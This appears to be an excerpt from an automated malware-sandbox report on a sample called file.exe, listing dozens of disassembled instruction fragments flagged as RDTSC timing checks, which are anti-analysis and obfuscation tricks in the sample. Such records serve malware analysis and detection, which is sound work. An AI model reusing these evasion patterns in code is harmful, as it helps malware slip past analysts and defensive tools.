Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790E32 second address: 790E76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jns 00007F5ED52EEF76h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 66E9F700h 0x00000015 add edx, 28311910h 0x0000001b push 00000003h 0x0000001d mov edx, dword ptr [ebp+122D2BCBh] 0x00000023 push 00000000h 0x00000025 add dword ptr [ebp+122D28E5h], ecx 0x0000002b push 00000003h 0x0000002d jp 00007F5ED52EEF79h 0x00000033 call 00007F5ED52EEF79h 0x00000038 push edi 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790E76 second address: 790EA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007F5ED4EAF484h 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F5ED4EAF47Eh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790EA6 second address: 790ED0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F5ED52EEF7Ch 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5ED52EEF84h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790ED0 second address: 790EE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5ED4EAF47Bh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790EE0 second address: 790F2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push edx 0x0000000c je 00007F5ED52EEF78h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov dl, al 0x00000018 lea ebx, dword ptr [ebp+12452976h] 0x0000001e jmp 00007F5ED52EEF89h 0x00000023 xchg eax, ebx 0x00000024 je 00007F5ED52EEF89h 0x0000002a pushad 0x0000002b jmp 00007F5ED52EEF7Bh 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790F2C second address: 790F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F5ED4EAF489h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 790F4D second address: 790F53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0C44 second address: 7B0C5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF480h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0C5D second address: 7B0C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F5ED52EEF76h 0x0000000a pop edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 jnp 00007F5ED52EEF7Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1257 second address: 7B1278 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF488h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1278 second address: 7B127D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B13C5 second address: 7B13CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1504 second address: 7B151C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED52EEF83h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B151C second address: 7B1524 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1524 second address: 7B1528 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B168E second address: 7B1692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1800 second address: 7B1849 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnc 00007F5ED52EEF76h 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007F5ED52EEF84h 0x00000017 jmp 00007F5ED52EEF83h 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1992 second address: 7B1996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1996 second address: 7B19A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B19A2 second address: 7B19A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B19A6 second address: 7B19AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B19AA second address: 7B19B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B19B3 second address: 7B19B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B19B9 second address: 7B19DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push edx 0x00000006 jno 00007F5ED4EAF476h 0x0000000c jmp 00007F5ED4EAF480h 0x00000011 pop edx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B19DC second address: 7B19E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B19E2 second address: 7B19E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1B41 second address: 7B1B47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1B47 second address: 7B1B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1B50 second address: 7B1B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF89h 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F5ED52EEF76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1B75 second address: 7B1B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1D24 second address: 7B1D2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7744D0 second address: 7744F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5ED4EAF47Ch 0x0000000a pop esi 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5ED4EAF47Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7744F2 second address: 7744F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7744F6 second address: 7744FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1E8F second address: 7B1E9B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jne 00007F5ED52EEF76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1E9B second address: 7B1EBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF489h 0x00000007 jo 00007F5ED4EAF47Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1EBE second address: 7B1ECD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B1ECD second address: 7B1ED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B26F3 second address: 7B2700 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 js 00007F5ED52EEF7Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2AD2 second address: 7B2B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED4EAF484h 0x00000009 jmp 00007F5ED4EAF47Eh 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 jns 00007F5ED4EAF476h 0x00000019 pop ecx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77E620 second address: 77E624 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B90E2 second address: 7B90E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7A45 second address: 7B7A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B7A4B second address: 7B7A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B93EE second address: 7B93F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F5ED52EEF76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD1BC second address: 7BD1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F5ED4EAF476h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD1CA second address: 7BD1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785254 second address: 785258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785258 second address: 78525C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78525C second address: 785269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785269 second address: 78526F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78526F second address: 7852AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED4EAF487h 0x00000009 popad 0x0000000a jmp 00007F5ED4EAF47Ah 0x0000000f popad 0x00000010 jo 00007F5ED4EAF488h 0x00000016 jbe 00007F5ED4EAF482h 0x0000001c js 00007F5ED4EAF476h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC6B8 second address: 7BC6F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF84h 0x00000007 jbe 00007F5ED52EEF7Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F5ED52EEF83h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC6F4 second address: 7BC6F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC6F8 second address: 7BC703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC863 second address: 7BC867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BC867 second address: 7BC86B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCCD0 second address: 7BCCDA instructions: 0x00000000 rdtsc 0x00000002 je 00007F5ED4EAF476h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCCDA second address: 7BCCE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop eax 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCCE7 second address: 7BCCFD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5ED4EAF488h 0x00000008 jmp 00007F5ED4EAF47Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCE39 second address: 7BCE62 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 je 00007F5ED52EEF76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F5ED52EEF85h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCE62 second address: 7BCE68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCE68 second address: 7BCE6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCE6D second address: 7BCE7D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5ED4EAF478h 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BCE7D second address: 7BCE81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD038 second address: 7BD03C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD03C second address: 7BD05C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F5ED52EEF76h 0x0000000d push edi 0x0000000e pop edi 0x0000000f jnc 00007F5ED52EEF76h 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push edi 0x0000001c pop edi 0x0000001d push eax 0x0000001e pop eax 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BD05C second address: 7BD064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BEDCE second address: 7BEDD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF0E2 second address: 7BF0E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF156 second address: 7BF16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED52EEF7Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF16D second address: 7BF172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF8AB second address: 7BF8AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF927 second address: 7BF93E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5ED4EAF482h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF93E second address: 7BF948 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F5ED52EEF76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF948 second address: 7BF94C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF94C second address: 7BF988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F5ED52EEF78h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F5ED52EEF82h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF988 second address: 7BF98D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFA57 second address: 7BFA5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFA5C second address: 7BFA62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFEE5 second address: 7BFEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFEE9 second address: 7BFEED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFEED second address: 7BFEF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFEF3 second address: 7BFEFD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5ED4EAF47Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C04B9 second address: 7C04D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED52EEF87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1DB1 second address: 7C1E19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5ED4EAF486h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dword ptr [ebp+122D30B6h], edi 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F5ED4EAF478h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 0000001Ch 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c or esi, dword ptr [ebp+122D3021h] 0x00000032 push 00000000h 0x00000034 mov esi, dword ptr [ebp+122D1B2Bh] 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F5ED4EAF480h 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C1E19 second address: 7C1E3F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F5ED52EEF76h 0x00000009 jno 00007F5ED52EEF76h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5ED52EEF81h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C298A second address: 7C29BA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5ED4EAF476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b jmp 00007F5ED4EAF484h 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D305Eh], ebx 0x00000018 push 00000000h 0x0000001a cmc 0x0000001b push eax 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C29BA second address: 7C29BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C4958 second address: 7C495C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C495C second address: 7C496A instructions: 0x00000000 rdtsc 0x00000002 je 00007F5ED52EEF76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C496A second address: 7C496E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C496E second address: 7C4998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jmp 00007F5ED52EEF83h 0x00000010 jmp 00007F5ED52EEF7Bh 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C54A3 second address: 7C54A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C97A6 second address: 7C97AB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
